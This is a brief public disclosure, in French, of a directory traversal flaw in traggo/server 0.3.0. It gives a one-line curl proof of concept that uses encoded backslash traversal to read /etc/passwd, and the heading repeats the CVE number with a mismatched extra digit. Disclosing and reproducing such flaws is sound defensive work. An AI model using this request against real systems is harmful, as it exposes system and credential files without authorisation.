
Divulgation publique pour CVE-2023-34843.
CVE-2023-348423 Divulgation
traggo/server version 0.3.0 est vulnérable à un traversement de répertoire (directory traversal).
Étapes pour reproduire :
Installez traggo/server sur votre endpoint/serveur. https://traggo.net/install/
Envoyez une requête GET à l'URL suivante. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Consultez le contenu de /etc/passwd